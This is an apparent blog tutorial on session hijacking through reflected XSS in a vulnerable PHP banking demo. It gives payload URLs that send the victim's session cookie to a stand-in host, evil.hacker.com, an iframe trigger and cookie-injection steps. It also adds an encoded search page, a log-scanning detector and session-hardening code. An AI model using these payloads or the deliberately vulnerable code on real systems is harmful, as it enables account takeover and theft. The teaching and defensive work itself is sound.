Wednesday 10 June 2015

Session Hijacking Using Reflected XSS: Example Application


Session hijacking occurs when an attacker captures a session token and injects it into their own browser to gain access to the victim's authenticated session.

Session hijacking attacks have some limitations:
1) Stealing cookies is useless if the target is using https:// for browsing.
2) Most cookies expire when the target logs out of a session. This also logs the attacker out of the session.
3) Many websites do not support parallel logins, which negates the use of a stolen cookie.

In this tutorial, we will see how a session cookie can be stolen using a reflected cross-site scripting attack.

Cross-site scripting (XSS) is a vulnerability that permits an attacker to inject code (typically HTML or JavaScript) into the contents of a website not under the attacker's control. When a victim views such a page, the injected code executes in the victim's browser in the context of that website's origin. The attacker has thus bypassed the browser's same-origin policy and can steal the victim's private information associated with the website in question.
In a reflected XSS attack, the attack is carried in the request itself (frequently the URL), and the vulnerability occurs when the server inserts the attacker's input into the response verbatim, or incorrectly escaped or sanitized. The victim triggers the attack by browsing to a malicious URL created by the attacker.

We develop a web application which has a reflected XSS vulnerability. When a user logs into the application, a session is created for him. The attacker creates a malicious URL that exploits the XSS vulnerability and captures the session token of the logged-in user.


Web Server Name: meru.mycompany.com
Attacker Machine: evil.hacker.com


1) Log in to the application by visiting the URL http://meru.mycompany.com/login.html and entering a username and password. On successful authentication, a session is created for the user, and the user is redirected to the URL http://meru.mycompany.com/search.php.





login.php
<?php
// Start the session before $_SESSION is read. The original called
// session_start() only after a successful login, so the isset() check
// below could never see an existing session.
session_start();

$error_msg = '';

if(!isset($_SESSION['loginid'])){
if(isset($_POST['submit'])){
  $loginid = $_POST['loginid'];
  $passwd = $_POST['passwd'];

  $conn = new mysqli('localhost','shabbir','shabbir','mybank');
  if($conn->connect_error){
    die('error connecting to server ' . $conn->connect_error);
  }

  // Bind the submitted values instead of interpolating them into the SQL
  // string, so the login form is not itself injectable. (The demo schema
  // compares the stored password directly, as the original query did.)
  $stmt = $conn->prepare("select loginid,passwd,custname from customer where loginid = ? and passwd = ?");
  $stmt->bind_param('ss', $loginid, $passwd);
  $stmt->execute();
  $result = $stmt->get_result();

  if ($result->num_rows == 1){
    $row = $result->fetch_assoc();
    $custname = $row['custname'];

    $_SESSION['loginid'] = $loginid;
    $_SESSION['custname'] = $custname;

    $stmt->close();
    $conn->close();
    header('Location: search.php');
    exit;   // stop here, otherwise the login form below is rendered as well
  }
  $error_msg="invalid username or password.\n";

  $stmt->close();
  $conn->close();
}
}
?>


<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>
<h2>Enter login details</h2>
<?php
if(! empty($error_msg)){
        echo "<strong>" . $error_msg . "</strong><br/>";
}
?>

<form action="login.php" method="post">

<label>Login id:</label>
<input type="text" name="loginid"  /> <br/>

<label>Password:</label>
<input type="password" name="passwd"  /> <br/>

<input type="submit" name="submit" value="submit"/>
</form>
</body>
</html>





2) The page 'search.php' contains a reflected XSS vulnerability. The application simply copies the search keyword into the output, as shown below.

This behavior of taking user-supplied input and inserting it into the HTML of the server's response is one of the signatures of reflected XSS vulnerabilities.

search.php
<?php
session_start();
?>

<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>

<?php
if(!isset($_SESSION['loginid'])){
  echo "please login";

} else{
  if(isset($_GET['submit'])){

      $item = $_GET['item'];
      // Reflected XSS: the raw query parameter is written into the page
      // without HTML encoding, so markup in it is rendered and run.
      echo "You searched for " . $item . "<br/>";

  } else{
?>

<h2>Enter Search Item </h2>

<form action="search.php" method="get">

<label>Search Keyword:</label>
<input type="text" name="item"  /> <br/>
<input type="submit" name="submit" value="submit"/>
</form>

<?php
}
}
?>

</body>
</html>
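For contrast, here is a hardened version of search.php. This is an added example, not code from the original post: it keeps the same session variable and form, but passes the keyword through htmlspecialchars() before writing it into the page, and sends a Content-Security-Policy header so that inline script is refused even if some other output path forgets to encode.

```php
<?php
// search.php, hardened. Added example, not the original post's code.
session_start();

// Refuse inline script entirely; the form and page need nothing external.
// A reflected payload that reaches the HTML is then still not executed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('X-Content-Type-Options: nosniff');

// Encode a string for insertion into HTML element content or an attribute value.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
?>
<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>

<?php
if (!isset($_SESSION['loginid'])) {
  echo "please login";
} elseif (isset($_GET['submit'])) {
  // Accept only a scalar string; item[]=x would otherwise reach htmlspecialchars as an array.
  $item = is_string($_GET['item'] ?? null) ? $_GET['item'] : '';
  // The original echoed $item as-is. Encoding turns
  //   car<script>alert(document.cookie)</script>
  // into inert text:
  //   You searched for car&lt;script&gt;alert(document.cookie)&lt;/script&gt;
  echo "You searched for " . h($item) . "<br/>";
} else {
?>

<h2>Enter Search Item </h2>

<form action="search.php" method="get">

<label>Search Keyword:</label>
<input type="text" name="item"  /> <br/>
<input type="submit" name="submit" value="submit"/>
</form>

<?php
}
?>

</body>
</html>
```

Output encoding is the fix for the bug itself; the CSP header is defence in depth and is only as good as the policy being strict (no 'unsafe-inline') on every page of the site.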



3) If we enter the following JavaScript as the search keyword: car<script>alert(document.cookie)</script>

we get a pop-up dialog displaying the session id, as shown below.






4) Through some means, the attacker feeds the following URL to the user.

http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/xss.php"%2bdocument.cookie;</script>&submit=submit

The user requests the URL fed to him by the attacker from the application.

Because of the XSS vulnerability, the server's response contains the JavaScript the attacker created.

The user's browser executes the attacker's JavaScript. The malicious JavaScript created by the attacker is:

var i=new Image; i.src="http://evil.hacker.com/xss.php"+document.cookie 

This code causes the user's browser to make a request to 'evil.hacker.com'. The request contains the user's session token for the application.

Note that the victim does not even need to explicitly click on the malicious link. Suppose the attacker owns 'evil.hacker.com' and creates a page 'attack.php' with an <iframe> pointing to the malicious link; if the victim visits 'http://evil.hacker.com/attack.php', the attack is triggered silently.

<html>
<body>
<iframe height="0" width="0" src='http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/"%2bdocument.cookie;</script>&submit=submit'></iframe>
</body>
</html>
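From the defender's side, the request in step 4 leaves a trace in the web server's access log on meru.mycompany.com: the query string arrives percent-encoded, but it still contains script markup, the string document.cookie and a URL pointing at another host. The following is an added example (not from the original post) of a small PHP script that scans Apache combined-format log lines for those signs; the file name xss_log_check.php and the sample log lines are constructed for the illustration.

```php
<?php
// xss_log_check.php (hypothetical file name): an added example, not code from
// the original post. Flags access-log requests whose query string carries
// script markup, a document.cookie reference, or an embedded external URL,
// which is what the step 4 URL looks like once the victim's browser sends it.

// Constructed sample log lines (not real traffic). The browser percent-encodes
// < > and " in the query string, so that is how the payload appears in the log.
$sample_log = <<<'LOG'
10.0.0.5 - - [10/Jun/2015:10:01:12 +0530] "GET /search.php?item=car&submit=submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jun/2015:10:03:44 +0530] "GET /search.php?item=car%3Cscript%3Evar+i=new+Image;+i.src=%22http://evil.hacker.com/xss.php%22%2bdocument.cookie;%3C/script%3E&submit=submit HTTP/1.1" 200 611 "http://evil.hacker.com/attack.php" "Mozilla/5.0"
10.0.0.7 - - [10/Jun/2015:10:05:02 +0530] "GET /login.php HTTP/1.1" 200 400 "-" "Mozilla/5.0"
LOG;

// Returns one entry per suspicious request: client, time, path, referer,
// and the reasons it was flagged.
function suspicious_requests(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Captures: client ip, timestamp, method, target, status, referer.
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d+) \S+ "([^"]*)"/', $line, $m)) {
            continue;   // not a combined-format line
        }
        $query = parse_url($m[4], PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;   // no user-controlled query string
        }
        // Decode twice so a double-encoded payload (%253C for <) is seen as well.
        $decoded = urldecode(urldecode($query));

        $reasons = [];
        if (preg_match('/<\s*script|<\s*img|on[a-z]+\s*=|javascript:/i', $decoded)) {
            $reasons[] = 'script markup in query';
        }
        if (stripos($decoded, 'document.cookie') !== false) {
            $reasons[] = 'reads document.cookie';
        }
        if (preg_match('#https?://[^/\s"\']+#i', $decoded, $u)
            && stripos($u[0], 'meru.mycompany.com') === false) {
            $reasons[] = 'external URL ' . $u[0];
        }
        if ($reasons) {
            $hits[] = [
                'ip'      => $m[1],
                'time'    => $m[2],
                'path'    => parse_url($m[4], PHP_URL_PATH),
                'status'  => (int) $m[5],
                'referer' => $m[6],
                'reasons' => $reasons,
            ];
        }
    }
    return $hits;
}

foreach (suspicious_requests($sample_log) as $h) {
    printf("%s %s %s %d referer=%s : %s\n",
        $h['time'], $h['ip'], $h['path'], $h['status'], $h['referer'], implode('; ', $h['reasons']));
}
```

Run it with php xss_log_check.php; only the second sample line is reported, with all three reasons and the evil.hacker.com referer that the iframe variant leaves behind. A status of 200 on a flagged line means the payload was reflected to a logged-in user, which is the case to treat as an incident rather than a probe.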


5) The attacker on 'evil.hacker.com'  runs 'Wireshark' and captures the session token as shown below:



6) Now the attacker has to insert this session token into a cookie in his browser and hijack the user's session. The attacker performs the following steps:

6.1) Open the Firefox web browser. Install the Greasemonkey Firefox extension:

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey

6.2) Install the Cookie Injector script in Greasemonkey:

http://userscripts-mirror.org/scripts/show/119798

http://dustint.com/post/12/cookie-injection-using-greasemonkey

6.3) Copy the session token from the 'Wireshark' output. Right-click on Request URI. Select Copy -> Bytes -> Printable Text Only. Then paste it into the 'gedit' text editor, as shown below:

/xss.php?c=PHPSESSID%3Dnef6vmd3ag8h7lo50m8190iee5

6.4) Edit the copied text as shown below.

Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5

6.5) Copy the above line.

6.6) Start the Firefox web browser. Press Alt+C to open the Cookie Injector dialog. Paste the copied line and click OK, as shown below.

6.7) The session has been hijacked. The attacker accesses the URL http://meru.mycompany.com/transfer.php and transfers money from the victim's account.
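Steps 5 and 6 work because the PHPSESSID cookie is readable from script, is accepted from any browser that presents it, and stays valid for as long as the victim's session does. The following is an added example (not code from the original post) of a session bootstrap file, session_boot.php (a hypothetical file name), that login.php and search.php would include in place of their own session_start() call. It assumes PHP 7.3 or later for the array forms of session_set_cookie_params() and setcookie(), and that the site is served over HTTPS, since a 'secure' cookie is never stored otherwise. HttpOnly, not HTTPS, is what stops the injected script from reading the cookie: the Image request from step 4 then carries an empty document.cookie.

```php
<?php
// session_boot.php (hypothetical file name): an added example, not code from
// the original post. Require it at the top of login.php and search.php.

session_set_cookie_params([
    'lifetime' => 0,        // discarded when the browser closes
    'path'     => '/',
    'domain'   => '',       // current host only
    'secure'   => true,     // never sent over plain http://
    'httponly' => true,     // invisible to document.cookie, so the injected
                            // Image request in step 4 carries no PHPSESSID
    'samesite' => 'Strict', // not sent on requests started from another site,
                            // e.g. the <iframe> on evil.hacker.com/attack.php
]);
// Reject any session id the server did not issue, and never read it from the URL.
ini_set('session.use_strict_mode', '1');
ini_set('session.use_only_cookies', '1');
session_start();

// Call after the credentials check succeeds. A fresh id at login (with the
// old one deleted) makes any token observed before login worthless.
function begin_login_session(string $loginid, string $custname): void
{
    session_regenerate_id(true);
    $_SESSION['loginid']   = $loginid;
    $_SESSION['custname']  = $custname;
    $_SESSION['last_seen'] = time();
    // Remember where the session was created. A token presented from another
    // address is a signal worth logging, not proof on its own, since mobile
    // and proxied users change address.
    $_SESSION['ip'] = $_SERVER['REMOTE_ADDR'] ?? '';
}

// Call on every authenticated page before trusting $_SESSION. The idle
// timeout bounds how long a captured token stays usable after the victim
// stops using the site.
function require_login(int $max_idle_seconds = 600): void
{
    if (!isset($_SESSION['loginid'])) {
        header('Location: login.php');
        exit;
    }
    if (time() - ($_SESSION['last_seen'] ?? 0) > $max_idle_seconds) {
        end_session();
        header('Location: login.php');
        exit;
    }
    if (($_SESSION['ip'] ?? '') !== ($_SERVER['REMOTE_ADDR'] ?? '')) {
        error_log(sprintf('session %s for %s used from %s, created from %s',
            session_id(), $_SESSION['loginid'], $_SERVER['REMOTE_ADDR'] ?? '?', $_SESSION['ip']));
    }
    $_SESSION['last_seen'] = time();
}

// Logout: destroy the server-side state (so a copied token dies with it,
// which is limitation 2 in the post) and expire the cookie in the browser.
function end_session(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}
```

With this in place, login.php calls begin_login_session($loginid, $custname) where it currently assigns $_SESSION directly, and search.php (and transfer.php) call require_login() before doing anything on the user's behalf. None of it removes the XSS bug itself; output encoding in search.php does that, and the cookie flags limit what an injected script can take if another reflection is missed.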


